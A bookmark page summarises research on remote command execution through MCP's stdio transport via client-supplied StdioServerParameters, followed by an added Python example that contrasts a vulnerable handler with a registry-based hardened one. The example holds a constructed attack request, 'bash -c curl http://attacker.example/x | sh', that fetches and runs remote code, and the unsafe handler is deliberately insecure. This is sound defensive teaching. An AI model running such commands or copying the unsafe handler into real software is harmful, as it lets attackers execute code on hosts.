klotz: maya posch*


  1. Researchers have identified a significant security flaw in Anthropic's Model Context Protocol (MCP), which is designed to connect Large Language Models with external tools. The protocol's stdio transport launches a tool server from a StdioServerParameters object whose fields name the command and arguments to run. Where a host application lets a client supply those fields, the client chooses what gets executed on the host, so the protocol's architecture enables remote command execution: the command and its arguments are run on the server side without any validation of where they came from. The researchers demonstrated this against LettaAI, LangFlow, Flowise, and Windsurf. When they brought the findings to Anthropic, the company responded that there is no design flaw and that sanitization is the responsibility of the developer integrating the protocol.
    Key points:
    - The MCP architecture facilitates remote command execution (RCE) via StdioServerParameters.
    - Absent validation, a client can pass arbitrary commands and arguments that are executed on the host.
    - Exploitation was successful against LettaAI, LangFlow, Flowise, and Windsurf.
    - Anthropic maintains the protocol works as designed, placing responsibility for security on developers.
    - Practitioner caveat: escaping or stripping shell metacharacters does not close this hole, because the command itself is attacker-chosen rather than interpolated into a fixed command line. A host should only launch servers it has pre-registered and let clients refer to them by name, never by command and argv.
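The following is an added example, not code from the bookmarked article, from Anthropic, or from any of the named products. It models the pattern the research describes: an MCP host that builds StdioServerParameters from a client-controlled request hands the client arbitrary command execution, and sanitizing the arguments cannot help because the command is attacker-chosen. The hardened variant only launches servers the operator registered in advance and rejects any request that tries to supply its own command or args. The StdioServerParameters class here is a stand-in with the same field names as the SDK class (command, args, env); the registry entries, request payloads, and the /opt/mcp/bin/filesystem-server path are constructed for the example.

```python
"""Vulnerable vs. hardened construction of MCP stdio server parameters.

Added example; not the page's or the MCP SDK's own code. The dataclass
mirrors the field names of the SDK's StdioServerParameters so the two
request handlers read like real host code.
"""
from __future__ import annotations

import subprocess
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class StdioServerParameters:
    """Stand-in for the SDK class: what process to spawn for a tool server."""
    command: str
    args: list[str] = field(default_factory=list)
    env: Optional[dict[str, str]] = None


# --- vulnerable pattern ---------------------------------------------------
def params_from_request_unsafe(payload: dict) -> StdioServerParameters:
    """Trusts the client for both command and argv.

    Escaping shell metacharacters in `args` would change nothing here:
    the client picks the executable, so "bash -c ..." is already a valid,
    fully sanitized request.
    """
    return StdioServerParameters(command=payload["command"],
                                 args=list(payload.get("args", [])))


# --- hardened pattern -----------------------------------------------------
# Servers the operator deliberately installed, keyed by a name the client
# may reference. The client never gets to name a command or argv.
# Paths below are constructed for the example.
REGISTERED_SERVERS: dict[str, StdioServerParameters] = {
    "filesystem": StdioServerParameters(
        command="/opt/mcp/bin/filesystem-server", args=["--root", "/srv/data"]),
    "echo-test": StdioServerParameters(command="echo", args=["mcp-server-ready"]),
}


class RejectedServer(ValueError):
    """Raised when a request is not a reference to a registered server."""


def params_from_request_safe(payload: dict) -> StdioServerParameters:
    """Resolves a server *name* against the registry; rejects everything else."""
    if "command" in payload or "args" in payload:
        raise RejectedServer("client may not supply command or args")
    name = payload.get("server")
    if not isinstance(name, str) or name not in REGISTERED_SERVERS:
        raise RejectedServer(f"unknown server {name!r}")
    base = REGISTERED_SERVERS[name]
    # Return a copy so a caller cannot mutate the registry entry in place.
    return StdioServerParameters(command=base.command, args=list(base.args),
                                 env=dict(base.env) if base.env else None)


def accepts(payload: dict) -> bool:
    """True if the hardened handler would launch something for this request."""
    try:
        params_from_request_safe(payload)
        return True
    except RejectedServer:
        return False


def spawn(params: StdioServerParameters, timeout: float = 5.0) -> str:
    """Launch the server the way the SDK does: an argv list, no shell.

    The absence of shell=True is not a defense in the unsafe path; the
    attacker simply asks for command="bash", args=["-c", ...].
    """
    proc = subprocess.run([params.command, *params.args], capture_output=True,
                          text=True, timeout=timeout, env=params.env)
    return proc.stdout


# Constructed attacker request of the kind the research describes.
ATTACK = {"command": "bash", "args": ["-c", "curl http://attacker.example/x | sh"]}


if __name__ == "__main__":
    p = params_from_request_unsafe(ATTACK)
    print("unsafe handler would spawn:", p.command, p.args)   # not executed here
    print("hardened handler accepts attack:", accepts(ATTACK))
    print(spawn(params_from_request_safe({"server": "echo-test"})).strip())
```

The unsafe handler is never actually executed in the demo; it is enough to see that it returns `bash -c ...` untouched. The hardened handler's two rejections are deliberately separate: a request carrying its own `command`/`args` is refused outright rather than silently ignored, so a misconfigured client fails loudly instead of appearing to work.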


SemanticScuttle - klotz.me: Tags: maya posch

Propulsed by SemanticScuttle